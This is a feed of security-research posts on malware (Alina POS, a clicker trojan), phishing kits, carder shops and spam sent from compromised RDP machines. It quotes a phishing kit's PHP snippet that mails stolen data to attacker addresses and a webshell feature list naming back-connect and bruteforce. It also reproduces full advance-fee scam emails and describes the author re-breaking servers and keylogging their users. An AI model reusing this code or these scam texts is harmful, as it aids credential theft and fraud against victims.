Quantcast
Channel: XyliBox
Viewing all 128 articles
Browse latest View live

spamb0x.com, World Wide Spam

$
0
0
• dns: 1 ›› ip: 37.221.170.207 - adresse: SPAMB0X.COM
Registrant Contact Details:
SPAM B0X (spam@b0x.com)
35030 Pardo
Westland
Michigan,48185
US
Tel. +363.8601482
Fax. +363.8601482

Login

News

Buy accounts

My accounts

Add funds

Downloads

Rules

Weird pic found on the server:

Admin cp: hxtp://spamb0x.com/admin/
Seem they was hacked: http://pastebin.com/ZZBued4i

Related to phishing:

adminshop2013.com (Carder shop)

$
0
0
• dns: 2 ›› ip: 98.139.135.22 - adresse: ADMINSHOP2013.COM
Admin Name: Admin PrivateRegContact
Admin Address: PO Box 61359
Admin Address: registered post accepted only
Admin Address: Sunnyvale
Admin Address: 94088
Admin Address: CA
Admin Address: US
Admin Email: contact@myprivateregistration.com

lol..:
should i drop table or something ?

Counterfeit euro notes

Win32/Pikboclick.A (Trojan.Clicker)

$
0
0
Sample: https://www.virustotal.com/file/9a3fb37aae8e5784a0a968c974a148b7cff875b92fd8917d840accc7e0c8066b/analysis/
Unpack: https://www.virustotal.com/file/69cb144b6ef526dd88832d6cab68740f563eb6b2fbe2380ecd5cd31980df0629/analysis/1359760543/

Create a registry persistence:
And some other keys..

Search if Internet Explorer is running:

And kill it when found:

Search for "Windows Internet Explorer" on handles
I've not checked what he do when found but probably kill it.

It connect to freetraffcounter.com
• dns: 1 ›› ip: 64.32.14.210 - adresse: FREETRAFFCOUNTER.COM

The source is grabbed and parsed:

To retrieve these urls:

Seem he removed urls for the moment, found before:
var DisplayLink = "http://pornkingworldtube.com"
var AdLink = "http://widget.plugrush.com/pornkingworldtube.com/1lhr"
var AdLink1 = "http://www.toonporn.com/video/11568114/3-d-cgi-babes-cum-over-cocks?aid=673"
var AdLink2 = "http://delivery.trafficbroker.com/direct.php?zoneid=158782"
var AdLink3 = "http://avatraffic.com/in.php?sid=987"

Some network used:


And navigate to the urls of the affiliate advertiser:


AC:\Users\Pike.Pike-PC\Desktop\Desktop\Bot Clicker\Project1.vbp
The guys used 11 Timers for this, learn to code dude.

Alina 3.4 (POS Malware)

$
0
0
The malware come from: http://vxvault.siri-urz.net/ViriFiche.php?ID=23179
Hosted on the site of a deputy.

GetPCname:

Create a mutex:

Create /%appdata%/java.exe
If the malware can't he will try with different name (jusched.exe, jucheck.exe, desktop.exe, dwm.exe, win-firewall.exe, adobeflash.exe)
If all names are take and in read only mode the malware is trapped on infinit loop :)))

Write the file:

and if he fail to write he will Copy it:

Add a registry persistence:

Launch the process:

Encode something (i've not checked what)

Call the C&C

And fail because the first is dead, so retry with 208.98.63.228
Backend info:
208.98.63.228:
OrgName: Sharktech
OrgId: SHARK-7
Address: 100 Pinehurst Ct.
City: Missoula
StateProv: MT
PostalCode: 59803
Country: US

http://208.98.63.228/main.php
http://208.98.63.228/info.php
http://208.98.63.228/test.php
http://208.98.63.228/test2.php
http://208.98.63.228/api.php
http://208.98.63.228/config.php
http://208.98.63.228/autoupdate.php
http://208.98.63.228/404.html
http://208.98.63.228/wordpress/admin.php
http://208.98.63.228/forum/admin.php
http://208.98.63.228/blog/admin.php
http://208.98.63.228/blog/export.php
http://208.98.63.228/blog/config.php
http://208.98.63.228/blog/front/stats.php
http://208.98.63.228/blog/front/cards.php
http://208.98.63.228/blog/front/settings.php
http://208.98.63.228/blog/front/logs.php


This one is cool because coder leaved comments for each action...

I tried to trigger it to send data but i've not succeeded yet.
I will see the rest later.
Alina is interesting i've found many version: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1756&start=40#p18008
Still i've not checked these files for the moment, i don't know differences.

Phish-BankFraud (EDF, CAF, and now Carrefour)

$
0
0
These days they do EDF+CAF and back with Carrefour.

 EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33

bigcave.php:
$send="Ayoub.boos7@hotmai1.fr";
$subject="EDF : $ip";
$from="From: Tool4Spam.Com";

mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);

Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024

Mechanism is interesting on this one

It extract a zip file inside a a freslhy created dir and write EDF customer IP on Vcounter.txt

Seem the bad guys tested it to see if everything work :)
It's always these 41.x IP from Morocco.
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)

The bad guys leaved Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:

'Nice'

Spamtool:

And some others craps...

For CAF and Carrefour they have not used Hijacked servers (just for redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804

The CAF mail is just a big failure:

Bank customers reply to phishing e-mail:
---
---
---
---
---
---
---
---

A new tool appeared, phishers will be probably interested.

Also i got an interesting mail:
That become a problem when hackers use hijacked servers (especially for phishing and malware hosting)
I concider myself as borderline, i re-break theses servers with my real IP to get the malicious stuff.
I leave files untouched, including hackers files, sometime i probably make more shit than them on log files, i don't edit thems to hide my IP.
I never got sued for hacking a compromised machine and i hope that will not happen.

Serenity Scanner (Private AV Checker)

$
0
0
Serenity Scanner is the new project of Oakley.
• dns: 1 ›› ip: 37.221.163.154 - adresse: SERENITYSCANNER.COM

Advert:

Homepage:

Register:

Homepage (when logged)

Scan:

Report page:

Autoscanner:

Deposit:

Subscriptions:

Logs:

Contact:

They use the scan4you API:
Trace of Serenity Exploit kit:

Screenshots:

Oh also...
uid,valid_date,developer_id,membership_id,rank,type,lname,fname,email,token,lastip,active,avatar,scanned,credits,created,package,reg_date,username,password,activated,userlevel,lastlogin,newsletter,last_login,trial_used,mem_expire,subscription,activation_code,autoscanner_limit,autoencrypter_limit
2,2147483647,0,0,1,autoscanner,<blank>,<blank>,**********@gmail.com,0,198,n,NULL,24,1,NULL,Scanner,2012-12-24 07:30:30,oaks35,67ddb18edd993921ce5c80dec1ebd9469e9de87f2e84a953a,activated,1,NULL,0,1359906344,0,NULL,1128,4449,0,0
Hacked.

Phish-BankFraud (Orange)

$
0
0
Found on a compromised server who run Wordpress.
It's the same actor as http://www.xylibox.com/2013/02/phish-bankfraud-edf-caf-and-now.html
But instead of EDF, Orange is targeted.

Phishing pages:
http://www.phishtank.com/phish_detail.php?phish_id=1724946
http://www.phishtank.com/phish_detail.php?phish_id=1724994

ghazalox.php:
$send="ayoub.boos7@gmail.com";

$subject="BoOooOooOs Rezuult";
$headers="Frm: ayoub.boos7@gmail.com>";
$headers.=$_POST['eMAdd']."\n";
$headers.="MIME-Version: 1.0\n";

mail($send,$subject,$message,$headers);

Same Spam tool and same backdoors used:

Backdoor.PHP.WebShell.BD:

Something new, Turbo Force:

And various custom r57 shells:


Dumped phishings can be found here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18119
And backdoors here: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=20#p18118



Bank customers reply to phishing e-mails:

---
---
---
---
---

And more and more e-mails...

Also i've found yesterday a changelog of Backdoor.PHP.WebShell.BD:
Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Описание возможностей / особенности:

* Авторизация на cookies
* Информация о сервере
* Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
* Просмотр, hexview, редактирование, скачивание, загрузка файлов
* Работа с zip архивами (упаковка, распаковка) + сжатие в tar.gz
* Консоль
* SQL менеджер (MySql, PostgreSql)
* Выполнение PHP кода
* Работа со строками + поиск хеша в онлайн базах
* Биндпорт и бек-коннект (Perl)
* Bruteforce FTP, MySQL, PgSQL
* Поиск файлов, поиск текста в файлах
* Поддержка *nix-like и Windows систем
* Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
* Можно использовать AJAX
* Небольшой размер. Упакованная версия занимает 22.8 Kb
* Выбор кодировки, в которой работает шелл.

Чейнджлог:
2.5

* Вместо сессий теперь используется cookies
* Исправлен поиск по exploit-db.com
* Убран раздел Safe-mode
* Шелл корректно работает при disabled_functions = scandir
* Теперь можно искать не только текст в файлах, но и просто файлы по маске
* Переработан mysql dump
* Изменен список сервисов в "Search for hash"
* Убраны изображения из phpinfo()
* "Мелкая косметика"
* Исправление других мелких багов


2.4

* добавлена переменная в конфиг, отвечающая за включение/выключения ипользования AJAX по умолчанию
* улучшен раздел Sql
* новый формат дампа (более компактный)
* возможность сохранять дамп в файл (если имя файла не указано, то дамп предлагается сразу скачать)
* gui получше, навигация по таблице теперь удобней
* добавлена возможность включить/отключить подсчет количества записей в таблицах
* Load file выводиться, если у пользователя хватает привилегий
* при неудачном коннекте к бд выводиться ошибку
* добавлена возможность смотреть ошибки в Console (перенаправление stderr в stdout)
* в Sec. Info добавлен вывод модулей Apache'а
* теперь в файловом менеджере при наведении на ссылки (я про ссылки в фс) всплывает подсказка куда ведет ссылка
* можно упаковывать в tar.gz, если доступно выполнение команд.
* можно указывать названия для архивов
* ссылка на поиск сплойта под ядро теперь ведет на exploit-db.com
* попытался выделить место куда в Console вбивать команды более заметно)
* фиксы багов

Plastic Services: Fake United States Cards

$
0
0
Found this guys who seem to de severals account on the same forum, he do credit cards and fake driver license:

Connecticut:
Florida:
New Jersey:
Pennsylvania:
Rhode Island :
 Ohio :
Wisconsin:


Credit Cards:


Mastercard/Visa holograms:


Another seller, specialised on Driver license and fake University cards:

Arizona:

California:


 Connecticut:

Washington:

 The guys do also Florida, Georgia, Illinois, Kentucky, Louisiana, Maryland, Maine, Michigan, Mississippi , New Jersey, Ohio, Pennsylvania, Rhode Island, South Carolina, Tennesseen, Texas, Virginia, Wisconsin
And fake university cards:

You're valentine is a carder

$
0
0
Small research done on severals compromissed RDP (and compromissed machines include a Medical one)

Mail extractor:
https://www.virustotal.com/file/24f48f4934872185983e7966bcfad309efee598c6b26f474929c2d9c3c341825/analysis/1360598076/

Mass mailer:
https://www.virustotal.com/file/d04c0af99334244e070e65d07d329b1fbb13d19aeffff25a89ffb989ff9569f3/analysis/1360597550/
Who come form
gicutzu.byethost33.com/vnc/ams1.zip
gicutzu.byethost33.com/vnc/ams.zip

Mailing:

Message body:
This is HTML source of message you composed. Do not modify here.</COMMENT>
To modify this message press HTML Messages Editor button.</COMMENT>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODYbgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONTsize=2color=#000000 face="Arial">
<DIV>
 DEAR SIR/MADAM</DIV>
<DIV>
 </DIV>
<DIV>
My name is Mercy Johnson am 75yrs old of age and I stay in white river</DIV>
<DIV>
New York City,USA.I am a good merchant, I have several industrial</DIV>
<DIV>
companies and good share in various banks in the world. I spend all my</DIV>
<DIV>
life on investment and corporate business. All the way I lost my</DIV>
<DIV>
husband and two beautiful kids in fatal accident that occurred in</DIV>
<DIV>
November 5th 2003.</DIV>
<DIV>
 </DIV>
<DIV>
I am a very greedy woman with all cost I dont know much and care about</DIV>
<DIV>
people, since when I have an experience of my families death, its</DIV>
<DIV>
difficult to sleep and give rest, later in the year 2004 February I</DIV>
<DIV>
was sent a letter of medical check up, as my personal doctor testify</DIV>
<DIV>
that I have a lung cancer, which can easily take off my life soon.</DIV>
<DIV>
 </DIV>
<DIV>
I found it uneasy to survive myself, because a lot f investment cannot</DIV>
<DIV>
be run and manage by me again. I quickly call up a pastor/prophet to</DIV>
<DIV>
give me positive thinking on this solution as my adviser. He minister</DIV>
<DIV>
to me to share my properties ,wealth, to motherless baby/orphanage</DIV>
<DIV>
homes/people that need money for survivor both student that need money</DIV>
<DIV>
for schooling, business woman and man for their investment and for</DIV>
<DIV>
future rising.</DIV>
<DIV>
 </DIV>
<DIV>
So therefore I am writing this letter to people who are really in need</DIV>
<DIV>
of help from me both student in college to contact me urgently, so</DIV>
<DIV>
that I can make an available preparation on that.</DIV>
<DIV>
 </DIV>
<DIV>
Especially women of the day, who are divorced by their husband, who</DIV>
<DIV>
cannot survive the mist of feeding their self, please contact me and</DIV>
<DIV>
stop weeping. Probably let me now what you really need the money for</DIV>
<DIV>
and if you can still help me to distribute money to nearest orphanage</DIV>
<DIV>
homes near your town. Now am so much with God, am now born again. May</DIV>
<DIV>
the lord bless you as you reach me, please to remind you, dont belongs</DIV>
<DIV>
to scammers or any act of fraud lent on internet. I will give more</DIV>
<DIV>
information to you as I await your response immediately.</DIV>
<DIV>
 </DIV>
<DIV>
Best Regards,</DIV>
<DIV>
Mrs. Mercy Johnson.</DIV>
</FONT>
</BODY></HTML>

GroundLabs.Card.Recon.v1.14.7-Lz0:
https://www.virustotal.com/fr/file/ce449ea544f8d524648d429faa1ae68b7572501cf21997d31c6b467f55e8600d/analysis/1360597849/
Legit signed application but carders use it to find credit cards.

Win32/Spy.POSCardStealer.A:
https://www.virustotal.com/file/af35e64fac9c73bbaa5e8658cc5d8f3057a89e745fd8d9ffa2ef224209138dc2/analysis/1360596995/
https://www.virustotal.com/file/180ed8d4e9d5ebdc7f7179b4cacc73ed0804e7c720d9710fcc20454a5ba163cb/analysis/1360596997/

Win32/Spy.POSCardStealer.C:

Carding tentative:
Also found that on the history:
https://travelsim.bg/checkout_final.php?OrderID=2422&Message=Success.+%2800%29
kentus555@gmail.com

firefox history for another rdp:
"yancymagnus@gmail.com"


AutoComplete feature of browser says "markfenton46" for validshop and "samx" as captcha

Craiglist mailer:
https://www.virustotal.com/fr/file/5408075078177c45bfca318d6291c078beb1eb0f6c8dd6fb1a3f007b2e280fff/analysis/1360711350/

Phishing:

RDP scanner:
https://www.virustotal.com/file/d53fb2aa459eb50e3d16f17835db3246e3016389cfa63c126263e24fa18729e7/analysis/1360711410/

Game server:

VNC scanner:
https://www.virustotal.com/file/835dd84eed9acff7056ded87d9672d725b915924323b5981737bd2ed5162efb4/analysis/1360711486/

After this first try, i've installed a keylogger to monitor carders activities.
Logs:



Screenshots took by the keylogger:














• dns: 2 ›› ip: 98.139.135.21 - adresse: WEIGHT-LOSS-RESOURCE.COM

Libery reserve on clipboard:

They download pictures of womens and creat fake dating profiles to contact people saying always the same things:


"koksjulian":
"SabensSandraDarleneF":

Registering a fake profile on 'POF'

"Hello my name is brotney" (fail)

Yahoo login:

Svetlana case:


Fake accounts on various dating sites, downloading a picture of a girl for "lavaplace":

Creating a fake profile:

Looking for people on "Zoosk":

And more and more:



Contacting a guys on "lavaplace":


And more and more, without forgiving to tell them a "happy valentines day":

Searching for more people:

Sending the same message to people:

Let's do some spam also:

Mail:

Some guys look surprised by the age difference:
---

Received messages on yahoo:

I don't talk about that here but compromised machines was also used alot for buy stuff with stolen credit cards according to my logs: LCD monitor, plane tickets... and some other shit's (i've not really looked what they have do with stolen money)
If you are part of the good force and interested by a copy of logs, drop me a mail.



Happy Valentine's Day.

Citadel cracked builder ?

$
0
0
Found recently this on a carding forum.

No idea if it's true or...
Многие тут знают историю того, как создатель цитадели AquaBox киданул меня и лишил поддержки по причине того, что я задолбал обращаться в саппорт. И это после того, как я заплатил $5000 за его продукт.
Больше информации есть в этой теме.
Поэтому теперь моя версия цитадели сломана и готова перейти в ваше пользование.

Цена $500 за билдер, который обошёлся мне в $5000.

Данная версия поддерживает все фишки цитадели кроме FTP-ифреймерa.

Инструкцию (которую делал я) можно скачать ЗДЕСЬ.
Помогу на начальном этапе, объясню некоторые моменты, но вы должны понимать, что это всё без поддержки от создателя троя.

Билдер полностью рабочий, админам предоставлю всё для проверки.
Продаётся с привязкой к вашему железу.


I've no idea if it's true or just a fake ad for steal money.
I don't get it why they worked on the 1.3.4.5 if they have original lic.
And weird things: the forum is private and only for trusted people (need to know the good port and shit's just to connect)
w8 & see...

and about private community... have a look on the index page of darkode.

Phish-BankFraud: RDP Spam

$
0
0
I've already do severals posts about EDF phishings:
Phish-BankFraud/PHP.Mailer/PHP.Shell
Phish-BankFraud (EDF+CAF)
Phish-BankFraud (EDF, CAF, and now Carrefour)

Still active:

But this time let's see one source: a compromised french machine...

HTML body:


SMTP:

The machine was also used to search other machines with weak passwords

For example, another French compromised machine used for spam:

This is HTML source of message you composed. Do not modify here.</COMMENT>
To modify this message press HTML Messages Editor button.</COMMENT>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODYbgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONTsize=2color=#000000 face="Arial">
<DIV>
<FONTsize=3color=#000080 face="Comic Sans MS"><B><I>From: National Security Agency (N.S.A)</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000080 face="Comic Sans MS"><B><I>United State of America</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000080 face="Comic Sans MS"><B><I>Crime Fighters</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#800000face="Comic Sans MS"><B><I><U>This is Official advise From U.S. Department of Justice NSA</B></I></U></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>National Security Agency, American's alliance prospect, we work in line with CIA and Federal Bureau of Investigation F.B.I to fight and minimize crime globally.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Be informed that you have given three working days extension to provide the required documents needed by Federal Reserve Bank to released the deposit of us$10.5million in your account, We work in affiliation with FBI and Homeland Security to carried out the required duty as mandated. we need mentioned document as soon as possible to enable all concern agency to perform the ratification of the transfer you are about to received from Federal Reserve Bank to your account.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>A proper documentation of this transfer is important for security of our country and world at large.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Original Fund Identification Record Certificate (O.F.I.R.C} is only proof Requested by Federal Reserve Bank to released the Deposit of US$10.5M in your account.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Listen very carefully If after this Three Days grace you did not get back to us with the mentioned document National Security Agency shall consider this money as an act of terrorism, money laundering . then Our security men will head to your City to apprehend you and bring you in for further interrogation.for you to have the mentioned documents Contact Mark Kojo on Tel +234-8169609435 or email markkojo2@yahoo.com for acquisition of mentioned Document which will facilitate for immediate release of the us$10.5million in your bank account.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Contact Person: Mark Kojo</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>E mail.address: markkojo2@yahoo.com</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Telephone: +234-8169609435</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Office Address: 15A Awolowo !Road, Ikoyi, Lagos.Nigeria.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>This US$10.5Million will be transferred into your bank account within two working days you secure FUND IDENTIFICATION RECORD CLEARANCE CERTIFICATE from Nigeria where the US$10.5M was originated.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>After providing the document National Security Agency will authorize Federal Reserve Bank to transfer us$10.5million into your bank account because with provision of this required document we shall clear the fund to be released in your account.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>We need this Fund Identification Record clearance Certificate as a proof to the below frozen wired transaction ID : 1010253822148 and Be informed that You do not have any rights to receive these US$10.5Milion UNTIL YOU SECURE Fund Identification Record clearance Certificate from our payment coordinator Mr Mark Kojo .</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"> </FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Note you don't have all the time in the world and delay is dangerous.</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>Mr. Brian Bluckwall</B></I></FONT><FONTsize=3color=#000000 face="Comic Sans MS"></FONT></DIV>
<DIV>
<FONTsize=3color=#000000 face="Comic Sans MS"><B><I>For: National Security Agency (NSA)</B></I></FONT></DIV>
</FONT>
</BODY></HTML>

French doctor compromised:


Spamming on compromised RDP

$
0
0

Sometime hackers lock the compromised RDP to avoid others hackers to use it,
on this screenshot: 497400 emails sent.


Subject: Director Telex/Foreign Operation (OB)
Attn: ,

Sometimes, I do wonder if you are really, really with your senses. How
Could you keep trusting people and at the end you will loose your hard
Earned money, or are you being deceived by their big names? They
Impersonate on many offices, claiming to be Governors, Directors/Chairmen
of one Office or the other. Their game plan is only just to extort your
hard Earned money. Now, the question is how long you will continue to be
Deceived? Sometimes, they will issue you fake check, introduce you to fake
Diplomatic delivery, un-existing on-line banking and they will also fake
wire transfer of Your fund with Payment Stop Order  and even send you fake
atm cards etc.

Anyway, by the virtue of my position I have been following this
Transaction from inception and all your efforts towards realizing the
Fund. More often than not, I sit down and laugh at your ignorance and That
of those who claim they are assisting you, it is very unfortunate That at
the end you loose. Although, I don't blame you because you are Not here in
Nigeria to witness the processing of your payment in Nigeria.The problem
you are having is that you been told the whole truth About this
transaction and it is because of this truth they decided to Be extorting
your money. The most annoying part is even fraudsters Have really taken
advantage of this opportunity to enrich them selves At your expense. Those
you feel are assisting or working for you are Your main problems. I know
the truth surrounding this payment and I am The only person who will
deliver you from this long suffering if you will abide  by my advice.

I also know that recently you have been dealing with people claiming to be
the EFCC. They claim that they are helping you and you forward all the
fraudulent e-mails you receive to them. At the end they do nothing about
the fraudsters.Do not pay any money to them because they are only
interested in your hard earned money and you will never receive any
compensation in return, they will always keep coming back to ask for more
money.

Please I beseech you to stop pursuit of shadows and being Deceived.Feel
free to contact me immediately as you receive this mail so that I can
Explain to you the modus-operandi guiding the release of your Payment. Do
not panic, be rest assured that this arrangement will be Guided by your
Embassy here in Nigeria.

N/B: You are urgently requested to provide me with the following information


Full Name
Address
Age
Telephone Number
Occupation


Contact me upon the receipt of this mail if you wish to receive your fund
and stop wasting your hard earn money.


Thanks and remain blessed.

Yours faithfully,

Mohammed Sani.
Director Telex/Foreign Operation (OB).
contact mrbendavid@yahoo.com
---
Subject: FROM THE ATM CARD OFFICE
COMMENT>This is HTML source of message you composed. Do not modify here.</COMMENT>
To modify this message press HTML Messages Editor button.</COMMENT>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODYbgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONTsize=2color=#000000 face="Arial">
<DIV>
<FONTsize=3face="Bookman Old Style">CONGRAT</FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style"></FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style"></FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style"></FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style"></FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style">A cash grant award of $5.2M from our Atm Card Award Promo has been awarded to you. Re-confirm your Full Names, Address ANY OF YOUR ID CARD, TELEPHONE NUMBERS. for the issuance and delivery of your Card. You can call me on my number +234-8088011161</FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style"> </FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style"> </FONT></DIV>
<DIV>
<FONTsize=3face="Bookman Old Style">George Williams.</FONT></DIV>
</FONT>
</BODY></HTML>
---
Subject: Hello Friend!!!
This is HTML source of message you composed. Do not modify here.</COMMENT>
To modify this message press HTML Messages Editor button.</COMMENT>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODYbgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONTsize=2color=#000000 face="Arial">
<DIV>
<FONTsize=3face="Times New Roman">Hello Friend,</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">I sincerely apologize for contacting you without due permission or under-going due process. I was left with no choice that to contact you immediately because I consider this information very Urgent and Emergency. You will agree with me that experience is the best teacher as we say. I have had alot of bad and hurtful experiences from those Fucking Internet Scammers. I received over 50 mails each day telling me to claim by Inheritance Funds worth Eight Hundred and Fifty Thousand United Stated Dollars. I fell to this trap and I lost alot of money. I will never forgive those Bastards from Africa to be specific Nigeria.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">I am pleased to inform you that i am one of the must happiest women on earth now because I was contacted by the Federal High Court Officials who directed me to the Real Organization in charge of my Funds. Now I have my funds directly transferred to my Bank Account. I will have to enjoy the rest of my life and family with this Fund as I resign my job on the 7th May, 2013. I have no reason to keep working when i have enough Funds to set up my own establishment.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Now you will be surprised how I got to know you. I was with the Federal High Court Official to sign and approve the Transfer of my Funds to my Bank (Bank Of America). I saw your name and e-mail address among the Beneficiaries of this Funds. I felt very sorry for those names and e-mail contacts because I know they might have been scammed by those Bastard. I quickly write out your email address. This is why I am contacting you today.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">If you have received any mail asking you to make any form of payment to get your Funds. I advice you to ignore such mail now and contact the Federal High Court Official in charge of the Release of your Funds. If you can contact him now, he is going to process your Funds Papers immediately and you will have your Funds transferred to your Bank Account within the next 24-48hours. But you will be required to provide your information to prove that you are the real owner and Beneficiary of this Fund. You can contact Barrister Jim Jones's via e-mail as stated below:</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Federal High Court Of Justice (United Kingdom)</FONT><BR>
<FONTsize=3face="Times New Roman">Name: Barrister Jim Jones's (Federal High Court Official)</FONT><BR>
<FONTsize=3face="Times New Roman">E-mail: barristerbimjones@yahoo.com </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman">Tel: +447024054197</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">My Dear Friend, I hope I have been able to help and prevent you from falling a scam victim to those insolent bastards. Please feel very free to get back to me if you need more information on this, i will be willing to help. Bye for now.</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT><BR>
<FONTsize=3face="Times New Roman">Utmost Regards,</FONT><BR>
<FONTsize=3face="Times New Roman">Mary L. Wells.</FONT></DIV>
</FONT>
</BODY></HTML>
---
Subject: RE-COMPENSATION WITH THE SUM OF $500,000.00 (FIVE HUNDRED THOUSAND UNITED STATES DOLLAR ONLY)
This is HTML source of message you composed. Do not modify here.</COMMENT>
To modify this message press HTML Messages Editor button.</COMMENT>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODYbgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONTsize=2color=#000000 face="Arial">
<DIV>
<FONTsize=3face="Times New Roman">RE-COMPENSATION WITH THE SUM OF $500,000.00 (FIVE HUNDRED THOUSAND UNITED STATES DOLLAR ONLY)</FONT><BR>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT></DIV>
<DIV>
<FONTsize=3face="Times New Roman"> </FONT><BR>
